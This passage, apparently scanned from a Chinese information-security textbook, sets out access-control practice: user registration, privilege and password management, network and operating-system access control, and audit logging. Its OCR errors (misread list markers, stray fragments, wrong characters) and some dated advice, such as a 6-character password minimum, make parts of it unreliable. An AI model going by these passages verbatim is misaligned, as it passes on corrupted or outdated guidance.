对 管理 层 授予 的 访问 权限 进行 批准 。 

G) 检查 所 授予 的 访问 权限 级 别 是 否 适合 业务 的 开展 ,是 否 与 组 织 的 安全 策略 相 一 致 ， 
例如 , 它 会 不 会 影响 责任 划分 。 

(4) 为 用 户 提供 访问 权限 的 书面 陈述 。 

(5) 要 求 用 户 签署 声明 ,表示 他 们 知晓 访问 的 条 件 。 

(6) 确保 服务 提供 商 在 完全 遵守 授权 程序 的 情况 下 才 提 供 访问 权限 。 

(7) 维护 对 注册 使 用 服务 的 所 有 用 户 的 正式 记录 。 

(8) 用 户 因 工作 变更 或 离开 组 织 时 ,立即 取消 其 访问 权限 。 

(9) 定期 检查 并 取消 多 余 的 用 户 ID 和 账户 。 

(10) 确保 不 向 其 他 用 户 签发 使 用 多 余 的 用 户 ID. 

OD 应 该 考虑 在 雇佣 服务 合同 中 增加 相应 的 条 款 , 规 定员 工 或 服务 代理 如 果 企图 进行 
非法 访问 , 则 予以 制裁 。 

2. 权限 管理 

应 该 严格 限制 权限 (用 户 能 借 此 越过 系统 或 应 用 程序 控制 措施 的 任何 多 用 户 信息 系统 
的 功能 或 设施 ) 的 分 配 和 使 用 。 系 统 权 限 使 用 不 当 常 常 是 系统 出 现 故 障 的 主要 作用 因素 , 结 
果 导 致 系统 遭 到 破坏 。 

对 于 要 求 防范 非法 访问 的 多 用 户 系 统 , 应 该 制定 正式 的 授权 程序 ,对 权限 分 配 进 行 控 
制 。 应 该 考虑 采取 以 下 步 又。 

CD. 应 该 确定 与 每 个 系统 产品 (如 操作 系统 、 数 据 库 管理 系统 和 各 个 应 用 程序 ) 相 关 的 
权限 ,还 应 该 确定 需要 为 其 分 配 这 些 权 限 的 员工 类 别 。 

(2) 应 该 按照 是 否 需要 使 用 的 原则 并 依据 具体 情况 为 个 人 分 配 权限 , 即 根据 需要 确定 
最 低 岗 位 要 求 。 

(3) 应 该 对 分 配 的 所 有 权限 授权 程序 和 记录 进行 维护 。 不 符合 授权 程序 , 则 不 授予 
权限 。 

(4) 应 该 提倡 系统 例 行 程序 的 开发 和 使 用 ,从 而 最 终 无 须 对 用 户 进行 授权 。 

(5) 对 于 非常 规 业 务 使 用 的 用 户 身份 ,应 分 配 权限 。 

3. 用 户口 令 管理 

口令 是 在 用 户 访 问 信 息 系统 和 服务 时 对 其 身份 进行 验证 的 一 种 方法 。 应 该 通过 正式 的 
管理 程序 来 控制 口令 的 分 配 。 采 用 这 种 方法 就 应 该 : 

要 求 用 户 签署 声明 ,保证 个 人 口令 安全 ,确保 工作 组 口令 仅 在 本 组 成 员 间 共 享 ( 可 以 在 
雇佣 条 款 和 条 件 中 反映 这 一 要 求 ) 。 

如 果 要 求 用 户 维 护 自己 的 口令 ,请 确保 一 开始 时 先 向 他 们 提供 一 个 安全 的 临时 口令 并 
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要 求 他 们 立即 更 改口 令 。 用 户 忘 记 口令 时 ,必须 在 对 该 用 户 进行 适当 的 身份 识别 后 才能 向 
其 提供 临时 口令 。 

在 向 用 户 提供 临时 口令 时 必须 确保 其 安全 。 应 避免 使 用 第 三 方 或 无 保护 的 (明文 ) 电 子 
邮件 。 用 户 应 对 收 到 的 口令 予以 确认 。 

绝 不 应 在 计算 机 系统 上 以 无 保护 的 形式 存储 口令 。 

还 有 一 些 其 他 的 用 户 身份 识别 和 验证 技术 (如 生物 统计 学 中 的 指纹 鉴定 ` 笔 迹 鉴定 和 芯 
片 等 硬件 标记 的 使 用 ) ,应 该 根据 情况 考虑 使 用 。 

4. 用 户 访问 权限 检查 

为 了 保证 对 访问 数据 和 信息 服务 进行 有 效 控制 ,管理 层 应 该 制定 正式 的 程序 ,定期 对 用 
户 访问 权限 进行 检查 : 

COD 对 用 户 访问 权限 进行 定期 检查 (建议 每 6 个 月 进行 一 次 ) 以 及 变动 后 检查 。 

(2) 对 于 授予 的 访问 特权 应 该 进行 更 频繁 的 检查 ,建议 每 3 个 月 进行 一 次 。 

(3) 定期 对 权限 分 配 情况 进行 检查 ,确保 没有 对 用 户 授予 非法 权限 。 


7.7.3 用 户 责任 


用 户 责任 的 目标 是 防止 非法 的 用 户 访问 ,授权 用 户 的 合作 态度 对 有 效 地 保障 安全 至 关 
重要 。 

应 该 让 用 户 了 解 进 行 有 效 访 问 控 制 的 责任 ,特别 是 口令 使 用 和 用 户 设备 安全 的 责任 。 

1. 口令 的 使 用 

选择 使 用 口令 时 ,用 户 应 该 按照 安全 可 靠 的 措施 进行 。 

口令 是 一 种 用 户 身 份 验证 方法 ,并 因此 确定 对 信息 处 理 设 施 或 服务 的 访问 权限 。 建 议 
所 有 用 户 : 

(1) 保证 口令 安全 。 

(2) 如 果 不 能 安全 保存 ,应 避免 在 纸 上 记 录 口 令 。 

(3) 只 要 有 迹象 表明 系统 或 口令 可 能 遭 到 破坏 时 ,应 立即 更 改口 令 。 

(4) 选用 高 质量 的 口令 ,最少 要 有 6 个 字符 。 

(5) 口令 必须 便于 记忆 。 

(6) 不 应 使 用 别人 通过 个 人 相关 信息 (如 姓名 电话 号 码 、 生 日 等 ) 容 易 猜 出 或 破解 的 口 
令 信息 。 

CL) 不 要 连续 使 用 同一 字符 ,不 要 全 部 使 用 数字 ,也 不 要 全 部 使 用 字母 。 

(8) 定期 更 改口 令 ,或 根据 访问 次 数 更 改口 令 ( 相 对 于 普通 口令 而 言 , 应 更 加 频繁 地 更 
改 特权 账户 口令 ) ,避免 再 次 使 用 旧 口 令 或 循环 使 用 旧 口 令 。 

(9) 首次 登录 时 应 更 改 临 时 口令 。 

(10) 不 要 在 任何 自动 登录 程序 中 使 用 口令 ,如 在 宏 或 功能 键 中 存储 。 

(11) 不 要 共享 个 人 用 户口 令 。 

(2) 用 户 需 要 访问 多 项 服务 或 平台 时 ,会 要 求 采用 多 个 口令 。 建 议 可 以 对 所 有 适当 提 
供 口令 保护 的 服务 使 用 一 个 高 质量 口令 。 

2. 无 人 值守 的 用 户 设备 

用 户 应 该 确保 对 无 人 值守 的 设备 进行 适当 的 保护 。 在 用 户 区 安装 的 设备 (如 工作 站 


或 文件 服务 器 ) 在 一 段 时 间 内 无 人 值守 时 应 该 进行 具体 的 保护 ,防止 受到 非法 访问 。 所 
有 用 户 和 承包 商都 应 该 了 解 保护 无 人 值守 设备 的 安全 要 求 和 程序 ,以 及 实施 这 种 保护 的 
责任 。 

建议 用 户 : 

COD 在 活动 会 话 完成 时 应 该 终止 会 话 , 除 非 可 以 采用 适当 的 锁定 机 制 来 保护 会 话 ( 如 采 
用 口令 保护 的 屏幕 保护 程序 ) 。 

(2) 会 话 结束 时 注销 大 型 主机 ( 即 不 要 仅 关 掉 PC 或 终端 ) 。 

(3) PC 或 终端 不 用 时 ,应 使 用 密 钥 锁 或 等 效 控制 措施 (如 口令 访问 ) 防 止 他 人 非法 
使 用 。 


7.7.4 网 络 访问 控制 


网 络 访问 控制 的 目标 是 保护 网 络 化 服务 。 应 该 控制 对 内 外 网 络 服务 的 访问 。 必 须 确保 
访问 网 络 和 网 络 服 务 的 用 户 不 会 破坏 这 些 网 络 服务 的 安全 ,确保 : 

(1) 组 织 网 络 与 其 他 组 织 网 络 或 公用 网 络 之 间 正 确 连 接 。 

(2) 用 户 和 设备 都 具有 适当 的 身份 验证 机 制 。 

(3) 在 用 户 访问 信息 服务 时 进行 控制 。 

1. 网 络 服务 的 使 用 策略 

与 网 络 服务 的 连接 如 果 不 安全 ,就 会 影响 整个 组 织 。 只 应 该 向 用 户 提供 对 专门 授权 使 
用 的 服务 的 直接 访问 权限 。 与 敏感 或 重要 业务 应 用 或 与 处 于 高 风险 区 域 ( 如 组 织 无 法 进 
行 安全 管理 和 控制 的 公共 或 外 部 区 域 ) 的 用 户 进行 网 络 连接 时 ,这 种 控制 措施 显得 尤其 
重要 。 

应 该 制定 网 络 和 网 络 服务 的 使 用 策略 。 策 略 应 包括 以 下 内 容 : 

(1) 允许 访问 的 网 络 和 网 络 服务 。 

(2) 确定 允许 谁 访问 哪个 网 络 和 哪 种 网 络 服务 的 授权 程序 。 

(3) 用 以 保护 网 络 连接 和 网 络 服务 访问 的 管理 控制 措施 和 程序 。 

(4) 此 策略 应 该 与 业务 访问 控制 策略 相 一 致 。 

2. 实施 控制 的 路 径 

从 用 户 终端 到 计算 机 服务 的 路 径 需 要 进行 控制 。 网 络 按 其 设计 应 该 允许 最 大 限度 的 资 
源 共享 和 路 由 选择 灵活 性 。 但 是 ,这 些 特 点 也 会 为 非法 访问 业务 应 用 或 非法 使 用 信息 设施 
创造 条 件 。 对 用 户 终 端 与 用 户 有 权 访 问 的 计算 机 服务 之 间 的 路 由 进行 控制 (如 创建 一 个 实 
施 控制 的 路 径 ) ,可 以 降低 这 种 风险 。 采 用 实施 控制 的 路 径 ,是 为 了 防止 任何 用 户 不 使 用 用 
户 终端 与 用 户 有 权 访 问 的 服务 之 间 的 路 由 ,而 采用 其 他 路 由 。 

这 通常 要 求 在 不 同 的 路 由 位 置 实施 若干 个 控制 措施 。 其 目的 是 为 了 通过 预定 方案 在 网 
络 各 点 上 限制 路 由 选择 方案 。 

示例 如 下 : 

(1) 分 配 专线 或 专门 电话 号 码 。 

(2) 自动 将 端口 连接 到 指定 应 用 系统 或 安全 网 关 。 

(3) 限制 个 人 用 户 的 菜单 和 子 菜单 选项 。 

(4) 防止 无 限制 的 网 络 漫游 。 


RERE 


LUE 


网 经 安全 与 信息 保障 


(5) 强制 外 部 网 络 用 户 使 用 指定 应 用 系统 和 /或 安全 网 关 。 

(6) 通过 安全 网 关 ( 如 防火 墙 ) 积 极 控制 允许 进行 的 信息 源 到 目的 地 址 的 通信 。 

CD 通过 为 组 织 内 用 户 组 设置 不 同 的 逻辑 域 (如 虚拟 专用 网 ) 来 限制 网 络 访问 。 

(8) 对 实施 控制 的 路 径 的 要 求 应 该 基于 业务 访问 控制 策略 。 

3. 外 部 连接 的 用 户 身 份 验 证 

外 部 连接 为 非法 访问 业务 信息 提供 了 可 能 ,如 拨号 访问 方法 。 所 以 ,远程 用 户 访问 应 该 
进行 身份 验证 。 存 在 各 种 各 样 的 身份 验证 方法 ,有 些 方法 的 保护 程度 更 高 一 些 , 如 采用 加 密 
技术 的 身份 验证 方法 能 够 提供 严格 的 身份 验证 。 通 过 风险 评估 来 确定 要 求 的 保护 程度 非常 
重要 。 它 对 于 身份 验证 方法 的 正确 选择 十 分 必要 。 

远程 用 户 的 身份 验证 可 以 通过 使 用 加 密 技 术 、 硬 件 标记 或 问答 协议 等 来 完成 。 专 线 或 
网 络 用 户 地 址 检查 工具 也 可 用 来 对 连接 源 提供 安全 保障 。 反 向 拨 叫 程序 和 控制 措施 (如 使 
用 反 向 拨 叫 调制 解 调 器 ) 可 以 防止 与 组 织 信息 处 理 设施 的 非法 连接 和 有 害 连接 。 此 类 控制 
措施 对 试图 远程 建立 与 组 织 网 络 连接 的 用 户 进行 身份 验证 。 使 用 此 控制 措施 时 ,组 织 不 应 
使 用 包括 呼叫 转移 在 内 的 网 络 服务 ,或 者 说 如 果 他 们 使 用 了 此 种 网 络 服务 ,就 应 该 禁用 这 种 
功能 ,避免 出 现 与 呼叫 转移 有 关 的 漏洞 。 反 向 拨 叫 程序 还 必须 确保 组 织 已 经 实际 断 开 连接 。 
否则 ,远程 用 户 可 以 通过 伪 称 反 向 拨 叫 验证 已 经 执行 而 仍 保持 线路 畅通 。 为 此 ,应 该 彻底 检 
测 反 向 拨 叫 程序 和 控制 措施 。 

4 节点 验证 

可 以 使 用 与 远程 计算 机 进行 自动 连接 的 工具 对 业务 应 用 进行 非法 访问 。 因 此 ,应 该 对 
与 远程 计算 机 系统 的 连接 进行 验证 。 如 果 该 连接 使 用 组 织 的 安全 管理 无 法 控制 的 网 络 ,这 
一 点 尤为 重要 。 当 远程 用 户 组 与 安全 的 共享 计算 机 设备 连接 时 ,节点 验证 可 以 作为 对 该 远 
程 用 户 组 的 一 种 可 选 验证 方法 。 

5. 远程 诊断 端口 的 保护 

对 诊断 端口 的 访问 应 该 严 加 控制 。 许 多 计算 机 和 通信 系统 安装 了 一 种 维护 工程 师 使 用 
的 拨号 远程 诊断 工具 。 这 些 诊断 端口 如 果 不 予以 保护 就 会 提供 一 条 非法 访问 途径 。 因 此 ， 
应 该 使 用 适当 的 安全 机 制 ( 如 密 钥 锁 ) 对 其 进行 保护 ,保证 它们 只 能 在 计算 机 服务 管理 员 和 
要 求 访问 的 软 硬 件 支持 人 员 进 行 适当 地 安排 后 才能 访问 。 

6. 网 络 划 分 

随 着 商业 合作 伙伴 关系 的 建立 ,要 求 对 信息 处 理 和 联网 设施 进行 互联 或 共享 。 因 此 ,网 
络 在 不 断 地 扩充 ,超越 了 传统 的 组 织 界限 。 这 样 的 扩充 会 提高 对 使 用 网 络 的 已 有 信息 系统 
非法 访问 的 风险 。 有 些 系统 由 于 人 敏感 性 或 重要 性 的 原因 要 求 进行 保护 ,不 允许 其 他 网 络 用 
户 进行 访问 。 在 这 种 情况 下 ,应 考虑 在 网 络 内 采用 一 些 控制 措施 把 信息 服务 组 .用户 组 和 信 
息 系 统 组 分 离开 来 。 

控制 大 型 网 络 安全 的 一 种 方法 是 将 其 分 割 成 不 同 的 逻辑 网 络 域 ( 如 组 织 的 内 部 网 络 域 
和 外 部 网 络 域 ) ,每 个 域 都 使 用 一 个 明确 的 安全 界限 来 加 以 保护 。 在 两 个 要 互联 的 网 络 之 间 
安装 一 个 安全 网 关 可 以 实现 这 样 的 一 个 安全 界限 ,从 而 控制 两 个 域 之 间 的 访问 和 信息 流动 。 
应 该 对 该 网 关 进 行 配置 ,以 便 按 照 组 织 的 访问 控制 策略 对 这 些 域 之 间 的 通信 进行 过 滤 ,阻止 
非法 访问 ,此 类 网 关 的 一 个 例子 就 是 常常 称 为 防火 墙 的 东西 。 网 络 分 割 成 域 的 标准 应 该 是 
访问 控制 策略 和 访问 要 求 , 还 应 考虑 采用 适用 的 路 由 选择 或 网 关 技 术 的 相对 成 本 以 及 它 对 


性 能 所 产生 的 影响 。 

7. 网 络 连接 控制 

共享 网 络 ,特别 是 跨 组 织 共享 网 络 的 访问 控制 策略 要 求 , 可 能 要 求 采 用 控制 措施 以 限制 
用 户 连 接 权 限 。 此 类 控制 措施 可 以 通过 过 滤 通 信和 量 的 网 关 采 用 预定 义 表 或 规则 的 方法 加 以 
实施 。 所 使 用 的 限制 应 该 基于 访问 策略 和 业务 应 用 的 要 求 ,还 应 该 进行 相应 的 维护 和 更 新 。 

对 应 该 加 以 限制 的 应 用 举例 如 下 : 

(1) 电子 邮件 。 

(2) 单 向 文件 传输 。 

(3) 双向 文件 传输 。 

(4) 交互 访问 。 

(5) 与 时 间或 日 期 有 关 的 网 络 访问 。 

8. 网 络 路 由 控制 

共享 网 络 ,特别 跨 组 织 的 共享 网 络 ,可 能 要 求 采 用 路 由 控制 措施 以 保证 计算 机 连接 和 信 
息 流 不 破坏 业务 应 用 的 访问 控制 策略 。 这 种 控制 措施 与 第 三 方 ( 非 组 织 ) 用 户 共享 的 网 络 常 
常 是 至 关 重 要 的 。 

路 由 控制 应 该 基于 适当 的 源 地 址 和 目标 地 址 检查 机 制 。 网 络 地 址 转换 也 是 非常 有 用 机 
制 , 用 于 隔离 网 络 ,防止 从 一 个 组 织 网 络 延伸 至 另 一 组 织 网 络 的 路 由 。 它 们 可 以 在 软件 或 硬 
件 中 进行 实施 。 实 施 人 员 应 该 了 解 所 部 署 机 制 的 强度 。 

9. 网 络 服务 安全 

有 各 种 各 样 的 可 用 公用 网 或 专用 网 服务 ,其 中 一 些 提 供 增 值 服 务 。 网 络 服务 可 能 具 
有 独特 或 复杂 的 安全 特点 。 使 用 网 络 服务 的 组 织 应 该 确保 所 有 服务 的 安全 性 都 有 明确 
说 明 。 


7.7.5 操作 系统 访问 控制 


操作 系统 访问 控制 的 目标 是 防止 非法 的 计算 机 访问 。 应 该 使 用 操作 系统 级 别 的 安全 设 
施 限制 对 计算 机 资源 的 访问 。 这 些 设 施 应 该 具有 以 下 功能 : 

CD 识别 和 验证 身份 。 如 果 需 要 ,还 要 验证 每 个 合法 用 户 的 终端 或 位 置 。 

(2) 记录 成 功 和 失败 的 系统 访问 。 

(3) 提供 适当 的 身份 验证 方法 。 如 果 使 用 了 口令 管理 系统 , 则 应 该 确保 使 用 高 质量 的 
口令 。 
(4) 根据 情况 限制 用 户 连 接 时 间 。 

(5) 其 他 访问 控制 措施 (如 问答 法 ) 如 果 根 据 业 务 风险 可 以 使 用 , 则 也 可 以 使 用 这 些 
方法 。 

1. 终端 自动 识别 功能 

应 该 考虑 使 用 终端 自动 识别 功能 来 验证 与 具体 位 置 和 便携 设备 的 连接 。 如 果 会 话 必须 
从 某 一 位 置 或 计算 机 终端 开始 , 则 可 以 使 用 终端 自动 识别 技术 。 

终端 内 或 终端 附带 的 标识 可 以 说 明 是 否 允 许 此 终端 开始 或 接收 某 些 具体 事务 。 可 能 需 
要 对 终端 进行 物理 保护 ,维护 终端 标识 的 安全 。 

还 可 以 使 用 其 他 几 个 技术 对 用 户 身 份 进行 验证 。 
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2. 终端 登录 程序 

通过 安全 的 登录 程序 能 够 访问 信息 服务 。 计 算 机 系统 登录 程序 按 其 设计 应 该 最 大 限度 
地 降低 非法 访问 的 概率 。 因 而 ,登录 程序 应 该 最 大 限度 地 减少 公开 的 系统 信息 ,避免 为 非法 
用 户 提供 方便 。 一 个 好 的 登录 程序 应 该 具体 如 下 功能 。 

(1) 在 登录 过 程 未 成 功 之 前 不 显示 系统 或 应 用 的 标识 。 

(2) 登录 期 间 不 提供 帮助 消息 ,以 免 为 非法 用 户 提供 方便 。 

(3) 只 有 在 所 有 输入 数据 完成 后 才 验 证 登录 信息 。 出 错时 ,系统 不 应 说 明 哪 部 分 数据 
正确 , 哪 部 分 数据 错误 。 

(4) 限制 允许 进行 的 登录 的 失败 次 数 (建议 为 3 次 ) 并 考虑 记录 失败 次 数 。 

(5) 允许 再 次 登录 之 前 强制 进行 时 延 ,或 者 如 果 未 获得 明确 授权 则 拒绝 再 次 登录 。 

(6) 断 开 数 据 链 路 连接 。 

(7) 限制 登录 程序 允许 的 时 间 上 限 和 下 限 。 如 果 超 过 限制 , 则 系统 终止 登录 过 程 。 

(8) 成 功 登 录 完 成 后 ,显示 以 下 信息 : 

CD. 以 前 成 功 登录 的 日 期 和 时 间 ; 

© 上 次 成 功 登录 以 来 登录 失败 的 详细 情况 。 

3. 用 户 身份 识别 和 验证 

所 有 用 户 ( 包 括 技术 支持 员工 ,如 操作 员 、 网 络 管理 员 、 系 统 程序 员 和 数据 库 管理 员 ) 都 
应 该 有 一 个 个 人 专用 的 唯一 标识 符 ( 用 户 ID) ,以 便 操作 能 够 追溯 到 具体 责任 人 。 用 户 ID 
不 应 该 说 明 用 户 权限 级 别 , 如 管理 员 、 主 管 。 

例外 情况 下 ,如 果 对 业务 显然 有 益 , 则 可 以 为 一 个 用 户 组 或 一 项 具体 工作 使 用 共享 用 户 
ID。 管 理 层 对 此 类 情况 应 进行 批准 并 进行 备案 。 为 了 明确 责任 ,可 以 要 求 使 用 其 他 控制 
措施 。 

对 于 用 户 提 供 的 身份 ,可 以 使 用 多 种 身份 验证 程序 来 加 以 证 实 。 口 令 是 一 种 很 常见 的 
身份 识别 和 验证 方法 ,是 仅 用 户 知晓 的 保密 信息 。 同 样 也 可 采用 加 密 方法 和 身份 验证 协议 
达到 同样 的 效果 ,也 可 以 使 用 用 户 的 内 存 标记 或 智能 卡 等 进行 身份 识别 和 验证 ,又 可 以 使 用 
基于 个 人 唯一 特点 或 特性 的 生物 统计 学 身份 验证 技术 来 验证 用 户 身 份 。 将 安全 技术 和 安全 
机 制 结合 起 来 ,可 以 进行 更 为 严格 的 身份 验证 。 

4. 口令 管理 系统 

口令 是 验证 用 户 是 否 具 有 计算 机 服务 访问 权限 的 主要 方法 之 一 。 口 令 管 理 系统 应 该 提 
供 有 效 的 交互 手段 ,保证 使 用 高 质量 的 口令 。 

一 些 应 用 要 求 通过 独立 授权 分 配 用 户口 令 。 大 多 数 情况 下 ,由 用 户 自己 选择 和 保护 
日 令 。 
一 个 好 的 口令 管理 系统 应 该 具备 以 下 功能 。 

d) 要 求 使 用 个 人 口令 ,明确 责任 。 
(2) 根据 情况 可 以 让 用 户 选 择 和 更 改 自 己 的 口令 ,还 可 以 让 用 户 采 用 一 种 确认 程序 , 允 
许 出 现 输入 错误 。 

(3) 选择 一 个 高 质量 的 口令 。 

(4) 用 户 在 维护 口令 时 要 求 进行 口令 更 改 。 

(5) 用 户 选择 口令 后 首次 登录 时 强行 要 求 用 户 更 改 临 时 口令 。 


(6) 保留 用 户 以 前 的 口令 记录 (如 过 去 12 个 月 的 记录 ) 。 

(7) 防止 重复 使 用 。 

(8) 输入 时 屏幕 上 不 显示 口令 。 

(9) 口令 文件 和 应 用 系统 数据 分 开 存 储 。 

(10) 利用 单 向 加 密 算法 以 加 密 方式 存储 口令 。 

AD 安装 软件 后 更 改 默认 的 供应 商 口令 。 

5. 系统 实用 程序 的 使 用 

大 多 数 计算 机 系统 都 有 一 个 或 多 个 能 够 越过 系统 和 应 用 控制 措施 的 系统 实用 程序 ,要 
对 其 使 用 严 加 限制 和 控制 。 应 考虑 采用 以 下 控制 措施 。 

(1) 使 用 系统 实用 程序 的 身份 验证 程序 。 

(2) 把 系统 实用 程序 从 应 用 软件 中 分 离 出 来 。 

(3) 系统 实用 程序 的 使 用 仅 限于 最 小 实际 委托 授权 用 户 数 。 

OD 对 系统 实用 程序 的 特殊 使 用 授权 。 

(5) 限制 系统 实用 程序 的 可 用 性 ,如 授权 更 改 的 期 限 。 

(6) 记录 系统 实用 程序 的 各 种 使 用 情况 。 

(7) 对 系统 实用 程序 的 授权 级 别 进行 定义 和 备案 。 

(8) 移 去 基于 所 有 不 必要 软件 的 实用 程序 和 系统 软件 。 

6. 保护 用 户 的 威胁 报 黎 

应 该 考虑 为 可 能 受到 威胁 的 用 户 提供 威胁 报警 功能 。 应 该 根据 风险 评估 来 决定 是 否 提 
供 此 类 报警 功能 。 应 该 对 如 何 处 理 威胁 报警 明确 职责 并 制定 相应 程序 。 

7. 终端 超时 

高 风险 地 域 ( 如 组 织 无 法 进行 安全 管理 的 公共 或 外 部 区 域 ) 或 服务 于 高 风险 系统 的 终端 
如 果 处 于 不 工作 状态 , 则 应 该 在 设 定 的 不 工作 时 间 后 予以 关闭 ,防止 非法 用 户 进行 访问 。 使 
用 该 超时 功能 ,系统 应 该 在 设 定 的 不 工作 时 间 后 清除 终端 屏幕 ,关闭 应 用 和 网 络 会 话 。 超 时 
延迟 应 该 反映 本 区 域 和 终端 用 户 的 安全 风险 。 

可 以 为 一 些 PC 提供 有 限 的 终端 超时 功能 。 这 些 PC 能 够 清除 屏幕 ,防止 非法 访问 ,但 
不 关闭 应 用 或 网 络 会 话 。 

8. 连接 时 间 限 制 

连接 时 间 限 制 应 该 提高 高 风险 应 用 中 的 安全 性 。 限 制 允许 计算 机 服务 与 终端 连接 的 
时 间 会 降低 非法 访问 的 概率 。 应 该 考虑 对 敏感 的 计算 机 应 用 ,特别 是 对 终端 安装 在 高 
风险 地 域 ( 如 组 织 无 法 进行 安全 管理 的 公共 或 外 部 区 域 ) 的 计算 机 应 用 实施 这 种 控制 
措施 。 

对 这 种 限制 举例 如 下 : 

(1) 对 批文 件 传送 或 定期 的 短 时 间 交 互 会 话 等 使 用 预定 的 时 间 间 隔 。 

(2) 如 果 不 要 求 在 加 班 或 延长 工作 时 间 内 进行 操作 ,连接 时 间 仅 限于 正常 工作 时 间 。 


7.7.6 应 用 程序 访问 控制 


应 用 程序 访问 控制 的 目标 是 防止 对 信息 系统 中 信息 的 非法 访问 。 应 该 在 应 用 系统 中 使 
用 安全 设施 限制 访问 。 软 件 和 信息 的 逻辑 访问 权 仅 应 授予 合法 用 户 ,而 应 用 系统 应 该 ， | 章 
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串 根 据 业 已 确定 的 业务 访问 控制 策略 控制 信息 和 应 用 系统 功能 的 用 户 访问 权 ; 四 防止 对 任 
何 能 够 越过 系统 和 应 用 程序 控制 措施 的 实用 程序 和 操作 系统 软件 进行 非法 访问 ; @ 不 妨害 
其 他 与 之 共享 信息 资源 的 系统 的 安全 ; @ 能 仅 向 信息 所 有 者 、 向 其 他 指定 的 合法 个 人 或 定 
义 的 用 户 组 提供 信息 访问 。 

1. 信息 访问 限制 

应 依据 确定 的 访问 控制 策略 、 个 人 业务 应 用 要 求 以 及 组 织 信 息 访问 策略 ,向 包括 技术 支 
持 人 员 在 内 的 应 用 系统 用 户 提供 对 信息 和 应 用 系统 功能 的 访问 权 。 为 了 支持 访问 限制 要 
求 , 应 该 考虑 使 用 以 下 控制 措施 。 

(1) 提供 用 于 控制 对 应 用 系统 功能 访问 的 菜单 。 

(2) 通过 对 用 户 文档 进行 适当 的 编辑 来 限制 用 户 了 解 无 权 访 问 的 信息 或 应 用 系统 
功能 。 

(3) 控制 用 户 的 访问 权 , 如 读 写 权限 、 删 除权 限 以 及 执行 权限 。 

(4) 保证 处 理 敏 感 信息 的 应 用 系统 输出 仅 包 含 与 输出 的 使 用 相关 的 信息 ,而 且 只 发 送 
给 授权 终端 ,包括 对 这 些 输出 进行 定期 检查 ,保证 将 多 余 的 信息 删除 掉 。 

2. 敏感 系统 的 隔离 

敏感 系统 可 以 要 求 有 专门 (隔离 ) 的 计算 环境 。 某 些 应 用 系统 对 潜在 的 数据 丢失 十 分 敏 
感 ,要 求 进行 特殊 处 理 。 敏 感性 说 明 应 用 系统 应 该 在 专门 的 计算 机 上 运行 ,只 应 与 委托 的 应 
用 系统 共享 资源 。 否 则 ,就 不 必 进 行 任何 限制 。 

应 考虑 以 下 因素 。 

(1) 应 用 程序 所 有 者 应 该 确定 应 用 系统 的 敏感 性 并 记录 在 案 。 

(2) 在 共享 环境 中 运行 敏感 应 用 程序 时 ,应 确定 与 其 共享 资源 的 应 用 系统 并 与 敏感 应 
用 程序 的 所 有 者 达成 共识 。 


7.7.7 监控 系统 的 访问 和 使 用 


监控 系统 的 访问 和 使 用 的 目标 是 检测 非法 活动 。 应 该 对 系统 进行 监控 ,检测 与 访问 控 
制 策略 不 符 的 情况 ,将 可 以 监控 的 事件 记录 下 来 ,在 出 现 安全 事故 时 作为 证 据 使 用 。 利 用 系 
统 监控 ,可 以 检查 所 采用 的 控制 措施 是 否 有 效 , 是 否 与 访问 策略 模型 相符 。 

1. 事件 日 志 记 录 

应 该 创建 记录 异常 事件 和 安全 相关 事件 的 审计 日 志 并 按照 协商 认可 的 保留 期 限 将 其 保 
留 一 段 时 间 。 审 计 日 志 还 应 包括 以 下 内 容 : 

(OD HP ID, 

(2) 登录 与 注销 的 日 期 和 时 间 。 

(3) 终端 标识 或 位 置 (如 果 可 能 ) 。 

(4) 系统 的 成 功 访问 和 拒绝 访问 记录 o 

G) 数据 与 其 他 资源 的 成 功 访问 和 拒绝 访问 记录 。 

(6) 某 些 审计 日 志 要 求 作 为 记录 保留 策略 内 容 归 档 , 或 者 因为 有 证 据 收 集 方面 的 要 求 
而 要 求 归档 。 


2. 监控 系统 的 使 用 

(1) 程序 和 风险 领域 

应 该 制定 信息 处 理 设施 使 用 情况 的 监控 程序 。 必 须 制 定 此 类 程序 ,保证 用 户 仅 执行 明 
确 授 权 的 操作 。 应 该 通过 风险 评估 确定 各 个 设施 要 求 的 监控 级 别 。 

应 该 考虑 的 领域 包括 : 

O 合法 访问 ,包括 如 下 详细 内 容 : 用 户 ID; 重要 事件 的 日 期 和 时 间 ; 事件 类 型 ; 所 访 
问 的 文件 ; 所 用 程序 /实用 程序 。 

@ 所 有 特权 操作 ,如 : 主管 账户 的 使 用 ; 系统 启动 和 停止 ; 1/0 设备 连接 /分 离 。 

G 非法 访问 次 数 ,如 : 失败 次 数 ; 访问 策略 的 违反 情况 和 通知 ; 网 关 和 防火 墙 ; 专门 负 
责 人 侵 检测 的 系统 的 预警 。 

@ 系统 预警 或 故障 ,如 : 控制 台 预 警 或 消息 ; 系统 日 志 异 常情 况 ; 网 络 管理 报警 。 

(2) 风险 因素 

应 该 对 监控 活动 的 结果 进行 定期 检查 ,检查 频率 取决 于 风险 情况 。 应 该 考虑 的 风险 因 
素 包 括 : 

CD 应 用 进程 的 危急 程度 。 

© 有 关 信 息 的 价值 ,敏感 性 或 重要 性 。 

© 系统 的 人 侵 和 滥用 历史 记录 。 

@ 系统 互联 程度 (尤其 是 公用 网 ) 。 

(3) 日 志 记录 和 评审 事件 

日 志 评 审 包 括 了 解 系统 面临 的 威胁 以 及 这 些 威胁 出 现 的 方式 。 有 些 事件 可 能 在 发 生 安 
全 事故 时 要 求 进行 进一步 调查 。 

系统 日 志 通 常 包括 大 量 的 信息 ,多 数 与 安全 监控 无 关 。 为 了 识别 用 于 安全 监控 目的 的 
重要 事件 ,应 该 考虑 将 相应 的 消息 类 型 自动 复制 到 另 一 个 日 志 中 ,以 及 使 用 适当 的 系统 实用 
程序 或 审计 工具 进行 文件 询问 。 分 配 日 志 评 审 责任 时 ,应 该 考虑 把 评审 人 员 和 被 监控 者 的 
角色 分 离开 来 。 

尤其 要 注意 日 志 记录 工具 的 安全 。 因 为 该 工具 如 果 随 意 使 用 ,就 可 能 在 安全 问题 上 产 
生 错 觉 。 控 制 措施 应 该 针对 性 地 防止 非法 更 改 和 操作 问题 ,包括 : 正在 停 用 日 志 记录 工具 ， 
对 所 记录 的 消息 类 型 进行 更 改 ; 正在 编辑 或 删除 日 志文 件 ; 日 志文 件 介质 即将 填 满 ,或 者 
无 法 记录 事件 ,或 者 重 写 。 

(4) 时 钟 同步 

计算 机 时 钟 的 正确 设置 十 分 重要 。 它 可 以 保证 审计 日 志 的 准确 性 。 在 法 律 案件 或 纪律 
